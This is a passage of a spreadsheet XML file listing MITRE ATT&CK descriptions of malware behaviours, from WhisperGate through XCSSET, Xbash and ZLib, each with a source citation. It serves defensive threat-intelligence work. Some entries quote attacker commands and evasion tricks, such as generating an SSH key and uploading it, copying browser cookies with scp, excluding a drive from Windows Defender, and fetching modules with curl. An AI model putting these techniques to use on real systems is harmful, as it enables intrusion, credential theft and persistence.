    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can stop its execution when it recognizes the presence of certain monitoring tools.(Citation: Unit 42 WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) has the ability to enumerate fixed logical drives on a targeted system.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can shutdown a compromised host through execution of `ExitWindowsEx` with the `EXW_SHUTDOWN` flag.(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can pause for 20 seconds to bypass antivirus solutions.(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can use a Visual Basic script to exclude the `C:\` drive from Windows Defender.(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can make an HTTPS connection to download additional files.(Citation: Unit 42 WhisperGate January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can download additional payloads hosted on a Discord channel.(Citation: Crowdstrike WhisperGate January 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[WhisperGate](https://attack.mitre.org/software/S0689) can use `cmd.exe` to execute commands.(Citation: Unit 42 WhisperGate January 2022)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can download files.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can inject files into running processes.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can open a command line interface.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can create a service.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) is usually configured with primary and backup domains for C2 communications.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) sets a WH_CBT Windows hook to search for and capture files on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) sets a WH_CBT Windows hook to collect information on process creation.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) uses NetUser-GetInfo to identify that it is running under an “Admin” account on the local system.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) uses HTTP for C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to use the macOS built-in zip utility to archive files.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can identify and add files that possess specific file extensions to an array for archiving.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to decrypt strings using hard-coded AES keys.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to receive and execute a self-delete command.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to enumerate the users home directory and the path to its own application bundle.(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can instruct the OS to execute an application without a dock icon or menu.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has been incompletely signed with revoked certificates.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has used icons mimicking MS Office files to mask payloads.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can invoke Apple APIs &lt;code&gt;contentsOfDirectoryAtPath&lt;/code&gt;, &lt;code&gt;pathExtension&lt;/code&gt;, and (string) &lt;code&gt;compare&lt;/code&gt;.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can be delivered as a compressed, encrypted, and encoded payload.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to generate the current date and time.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can use the &lt;code&gt;open&lt;/code&gt; command to execute an application.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to use HTTP for C2 communications.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[Windows Credential Editor](https://attack.mitre.org/software/S0005) can dump credentials.(Citation: Amplia WCE)</t>
  </si>
  <si>
    <t>[Winexe](https://attack.mitre.org/software/S0191) installs a service on the remote system, executes the command, then uninstalls the service.(Citation: Secpod Winexe June 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) exploits CVE-2016-4117 to allow an executable to gain escalated privileges.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) deletes its payload along with the payload's parent process after it finishes copying files.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) performs multiple process injections to hijack system processes and execute malicious code.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) checks for the presence of Bitdefender security software.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) uses services.exe to register a new autostart service named "Audit Service" using a copy of the local lsass.exe file.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has decoded XOR encoded strings holding its configuration upon execution.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host. (Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used ICMP, custom TCP, and UDP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) can encode its configuration file with single-byte XOR encoding.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a custom TCP protocol with four-byte XOR for command and control (C2).(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used HTTP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can use a variant of the sysprep UAC bypass.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) dropper can decrypt and decompresses a data blob.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) dropper component can verify the existence of a single command line parameter and either terminate if it is not found or later use it as a decryption key.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) HTTP/S C2 mode can make use of an external proxy.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can delete the DLLs for its various components from a compromised host.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can check for the presence of specific files prior to moving to the next phase of execution.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) dropper can place malicious payloads on targeted systems.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) HTTP/S C2 mode can make use of a local proxy.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>A [Winnti for Windows](https://attack.mitre.org/software/S0141) implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.(Citation: Microsoft Winnti Jan 2017)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can use Native API to create a new process and to start services.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can communicate using custom TCP.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) has the ability to encrypt and compress its payload.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can check if the explorer.exe process is responsible for calling its install function.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can add a service named &lt;code&gt;wind0ws&lt;/code&gt; to the Registry to achieve persistence after reboot.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) installer loads a DLL using rundll32.(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can run as a service using svchost.exe.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can XOR encrypt C2 traffic.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can determine if the OS on a compromised host is newer than Windows XP.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) can set the timestamps for its worker and service components to match that of cmd.exe.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) has the ability to use encapsulated HTTP/S in C2 communications.(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) sets its DLL file as a new service in the Registry to establish persistence.(Citation: Microsoft Winnti Jan 2017)</t>
  </si>
  <si>
    <t>It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the [Wiper](https://attack.mitre.org/software/S0041) malware.(Citation: Dell Wiper)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getFirefoxPassword function to attempt to locate Firefox passwords.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory.(Citation: XAgentOSX 2017) [XAgentOSX](https://attack.mitre.org/software/S0161) contains the showBackupIosFolder function to check for IOS device backups by running &lt;code&gt;ls -la ~/Library/Application\ Support/MobileSync/Backup/&lt;/code&gt;.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the execFile function to execute a specified file on the system using the NSTask:launch method.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getProcessList function to run &lt;code&gt;ps aux&lt;/code&gt; to get running processes.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getInstalledAPP function to run &lt;code&gt;ls -la /Applications&lt;/code&gt; to gather what applications are installed.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getInfoOSX function to return the OS X version as well as the current user.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) will compress entire &lt;code&gt;~/Desktop&lt;/code&gt; folders excluding all &lt;code&gt;.git&lt;/code&gt; folders, but only if the total data size is under 200MB.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses a malicious browser application to replace the legitimate browser in order to continuously capture credentials, monitor web traffic, and download additional modules.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) adds malicious code to a host's Xcode projects by enumerating CocoaPods &lt;code&gt;target_integrator.rb&lt;/code&gt; files under the &lt;code&gt;/Library/Ruby/Gems&lt;/code&gt; folder or enumerates all &lt;code&gt;.xcodeproj&lt;/code&gt; folders under a given directory. [XCSSET](https://attack.mitre.org/software/S0658) then downloads a script and Mach-O file into the Xcode project folder.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) performs AES-CBC encryption on files under &lt;code&gt;~/Documents&lt;/code&gt;, &lt;code&gt;~/Downloads&lt;/code&gt;, and
&lt;code&gt;~/Desktop&lt;/code&gt; with a fixed key and renames files to give them a &lt;code&gt;.enc&lt;/code&gt; extension. Only files with sizes 
less than 500MB are encrypted.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) collects contacts and application data from files in Desktop, Documents, Downloads, Dropbox, and WeChat folders.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) adds malicious file paths to the &lt;code&gt;DYLD_FRAMEWORK_PATH&lt;/code&gt; and &lt;code&gt;DYLD_LIBRARY_PATH&lt;/code&gt; environment variables to execute malicious code.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) exfiltrates data stolen from a system over its C2 channel.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) has used a zero-day exploit in the ssh launchdaemon to elevate privileges and bypass SIP.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) has used `mdfind` to enumerate a list of apps known to grant screen sharing permissions.(Citation: Application Bundle Manipulation Brandon Dalton)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) prompts the user to input credentials using a native macOS dialog box leveraging the system process &lt;code&gt;/Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) has dropped a malicious applet into an app's `.../Contents/MacOS/` folder of a previously launched app to bypass Gatekeeper's security checks on first launch apps (prior to macOS 13).(Citation: Application Bundle Manipulation Brandon Dalton)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses a hidden folder named &lt;code&gt;.xcassets&lt;/code&gt; and &lt;code&gt;.git&lt;/code&gt; to embed itself in Xcode.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) downloads browser specific AppleScript modules using a constructed URL with the &lt;code&gt;curl&lt;/code&gt; command, &lt;code&gt;https://" &amp; domain &amp; "/agent/scripts/" &amp; moduleName &amp; ".applescript&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) loads a system level launchdaemon using the &lt;code&gt;launchctl load -w&lt;/code&gt; command from &lt;code&gt;/System/Librarby/LaunchDaemons/ssh.plist&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses the &lt;code&gt;chmod +x&lt;/code&gt; command to grant executable permissions to the malicious file.(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) builds a malicious application bundle to resemble Safari through using the Safari icon and &lt;code&gt;Info.plist&lt;/code&gt;. (Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses the &lt;code&gt;plutil&lt;/code&gt; command to modify the &lt;code&gt;LSUIElement&lt;/code&gt;, &lt;code&gt;DFBundleDisplayName&lt;/code&gt;, and &lt;code&gt;CFBundleIdentifier&lt;/code&gt; keys in the &lt;code&gt;/Contents/Info.plist&lt;/code&gt; file to change how [XCSSET](https://attack.mitre.org/software/S0658) is visible on the system.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[XCSSET](https://attack.mitre.org/software/S0658) will create an ssh key if necessary with the &lt;code&gt;ssh-keygen -t rsa -f $HOME/.ssh/id_rsa -P&lt;/code&gt; command. [XCSSET](https://attack.mitre.org/software/S0658) will upload a private key file to the server to remotely access the host without a password.(Citation: trendmicro xcsset xcode project 2020) </t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) saves a screen capture of the victim's system with a numbered filename and &lt;code&gt;.jpg&lt;/code&gt; extension. Screen captures are taken at specified intervals based on the system. (Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) searches firewall configuration files located in &lt;code&gt;/Library/Preferences/&lt;/code&gt; and uses &lt;code&gt;csrutil status&lt;/code&gt; to determine if System Integrity Protection is enabled.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses &lt;code&gt;ps aux&lt;/code&gt; with the &lt;code&gt;grep&lt;/code&gt; command to enumerate common browsers and system processes potentially impacting [XCSSET](https://attack.mitre.org/software/S0658)'s exfiltration capabilities.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses &lt;code&gt;scp&lt;/code&gt; to access the &lt;code&gt;~/Library/Cookies/Cookies.binarycookies&lt;/code&gt; file.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[XCSSET](https://attack.mitre.org/software/S0658) uses RC4 encryption over TCP to communicate with its C2 server.(Citation: trendmicro xcsset xcode project 2020)  </t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) identifies the macOS version and uses &lt;code&gt;ioreg&lt;/code&gt; to determine serial number.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses AppleScript to check the host's language and location with the command &lt;code&gt;user locale of (get system info)&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>Using the machine's local time, [XCSSET](https://attack.mitre.org/software/S0658) waits 43200 seconds (12 hours) from the initial creation timestamp of a specific file, &lt;code&gt;.report&lt;/code&gt;. After the elapsed time, [XCSSET](https://attack.mitre.org/software/S0658) executes additional modules.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XCSSET](https://attack.mitre.org/software/S0658) uses a shell script to execute Mach-o files and &lt;code&gt;osacompile&lt;/code&gt; commands such as, &lt;code&gt;osacompile -x -o xcode.app main.applescript&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) uses SSL/TLS and RC4 to encrypt traffic.(Citation: Invincea XTunnel)(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>A version of [XTunnel](https://attack.mitre.org/software/S0117) introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) is capable of accessing locally stored passwords on victims.(Citation: Invincea XTunnel)</t>
  </si>
  <si>
    <t>The C2 server used by [XTunnel](https://attack.mitre.org/software/S0117) provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) is capable of probing the network for open ports.(Citation: Invincea XTunnel)</t>
  </si>
  <si>
    <t>A version of [XTunnel](https://attack.mitre.org/software/S0117) introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) relays traffic between a C2 server and a victim.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) has been used to execute remote commands.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can create a cronjob for persistence if it determines it is on a Linux system.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Xbash](https://attack.mitre.org/software/S0341) has destroyed Linux-based databases as part of its ransomware capabilities.(Citation: Unit42 Xbash Sept 2018)	</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can obtain a webpage hosted on Pastebin to update its C2 domain list.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.(Citation: Unit42 Xbash Sept 2018)(Citation: Trend Micro Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can download additional malicious files from its C2 server.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can execute malicious JavaScript payloads on the victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use mshta for executing scripts.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can perform port scanning of TCP and UDP ports.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.(Citation: Unit42 Xbash Sept 2018)(Citation: Trend Micro Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can create a Startup item for persistence if it determines it is on a Windows system.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use regsvr32 for executing scripts.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can collect IP addresses and local intranet information from a victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can execute malicious VBScript payloads on the victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) uses HTTP for C2 communications.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) decrypts downloaded files before execution.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP GET requests to download other files that are executed in memory.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) encrypts its configuration file using a simple algorithm.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) checks for antimalware solution processes on the system.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) checks for the system’s Windows OS version and hostname.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP for C2.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>The [ZLib](https://attack.mitre.org/software/S0086) backdoor compresses communications using the standard Zlib compression library.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has sent data and files from a compromised host to its C2 servers.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to enumerate files and drives.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to download files.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to obtain screenshots of the compromised system.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
